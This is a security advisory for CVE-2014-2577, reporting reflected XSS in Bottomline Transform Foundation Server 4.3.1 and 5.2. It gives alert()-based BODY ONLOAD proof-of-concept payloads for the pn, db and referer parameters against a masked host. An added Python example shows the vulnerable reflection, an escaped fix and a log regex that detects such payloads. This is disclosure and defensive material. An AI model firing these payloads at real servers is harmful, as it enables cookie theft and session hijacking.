[CVE-2014-2577] XSS on Transform Foundation Server 4.3.1 and 5.2 from Bottomline Technologies

2014-06-14T00:00:00
ID SECURITYVULNS:DOC:30844
Type securityvulns
Reporter Securityvulns
Modified 2014-06-14T00:00:00

Description

I. VULNERABILITY

Reflected XSS vulnerabilities in Transform Foundation Server 4.3.1 and 5.2 from Bottomline Technologies

II. BACKGROUND

Bottomline offers powerful, next-generation electronic document solutions for formatting, personalizing and delivering ERP and business application output.

III. DESCRIPTION

Several reflected XSS vulnerabilities have been detected in Transform Foundation Server 4.3.1 and 5.2:

  1. XSS on GET parameters:

http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn="XSS CODE"

http://XXXXXXXXXXXXX/"XSS CODE"server-status.cgi

  2. XSS on POST parameters:

URL: XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp

PARAMETERS:

db="XSS CODE" referer="XSS CODE"

IV. PROOF OF CONCEPT

GET:

The application does not validate the parameter "pn" correctly.

http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn=</i></p><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>

http://XXXXXXXXXXXXX/<BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>server-status.cgi

POST:

The application does not validate the parameters "db" and "referer" correctly.

XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp

db=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>

and

referer=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')
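As an added illustration, not part of the advisory or of the vendor's code: a hypothetical reflection template that mirrors the `</i></p>` break-out context shown above, the HTML-escaped rendering that neutralises such a payload, and a check over constructed access-log lines that flags GET requests whose query parameters carry tag or event-handler fragments (POST bodies such as `db` and `referer` do not appear in standard access logs, so that check covers only the GET vector).

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Hypothetical template mirroring the reflection context implied by the
# advisory: the "pn" value lands inside <p><i>...</i></p>, so a value that
# begins with "</i></p>" closes those elements and injects a new <BODY>.
TEMPLATE = "<p><i>{value}</i></p>"

def render_vulnerable(value: str) -> str:
    """Reflects the raw parameter (the behaviour the advisory reports)."""
    return TEMPLATE.format(value=value)

def render_hardened(value: str) -> str:
    """HTML-escapes the parameter for an element-content context."""
    return TEMPLATE.format(value=html.escape(value, quote=True))

def contains_injected_element(rendered: str) -> bool:
    """True if a <body ...> tag with an event-handler attribute survived."""
    return re.search(r"<\s*body\s+on\w+\s*=", rendered, re.IGNORECASE) is not None

# Constructed access-log lines (combined log format, not real traffic); the
# second carries a payload shaped like the one in section IV, URL-encoded as
# a browser would send it.
LOG_LINES = [
    '10.0.0.5 - - [14/Jun/2014:10:00:01 +0000] "GET /TransformContentCenter/index.fsp/document.pdf?pn=1234 HTTP/1.1" 200 512',
    '10.0.0.9 - - [14/Jun/2014:10:00:02 +0000] "GET /TransformContentCenter/index.fsp/document.pdf?pn=%3C/i%3E%3C/p%3E%3CBODY%20ONLOAD=alert(1)%3E HTTP/1.1" 200 512',
]

# Tag fragments or on*= attributes inside a decoded query value.
SUSPICIOUS = re.compile(r"<\s*/?\s*\w+[^>]*>|\bon\w+\s*=", re.IGNORECASE)

def flag_xss_attempts(lines):
    """Return (client_ip, parameter, decoded value) for requests whose
    query-string parameters contain HTML tags or event-handler attributes."""
    hits = []
    for line in lines:
        m = re.search(r'^(\S+) .*?"(?:GET|POST) (\S+) ', line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qs percent-decodes values, so encoded payloads are caught too
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for name, values in params.items():
            for v in values:
                if SUSPICIOUS.search(v):
                    hits.append((ip, name, v))
    return hits
```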

V. BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in the context of the victim user's browser, allowing cookie theft and session hijacking and thus enabling full access to the box.

VI. SYSTEMS AFFECTED

Transform Foundation Server 4.3.1
Transform Foundation Server 5.2

VII. SOLUTION

Patches released by the vendor are available on the customer portal; release information is available here:

  1. Transform Foundation Server 4.3.1 Patch 8: http://www.pdf-archive.com/2014/06/03/tf431patch8releasenotes/preview/page/9/

SF2351630 SF2364411 SF2391461

  2. Transform Foundation Server 5.2 Patch 7: http://www.pdf-archive.com/2014/06/03/tf431patch8releasenotes/preview/page/9/

SF2351630 SF2364411 SF2391461

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2577

Detected and reported by J. Francisco Bolivar (es.linkedin.com/in/jfbolivar/) @Jfran_cbit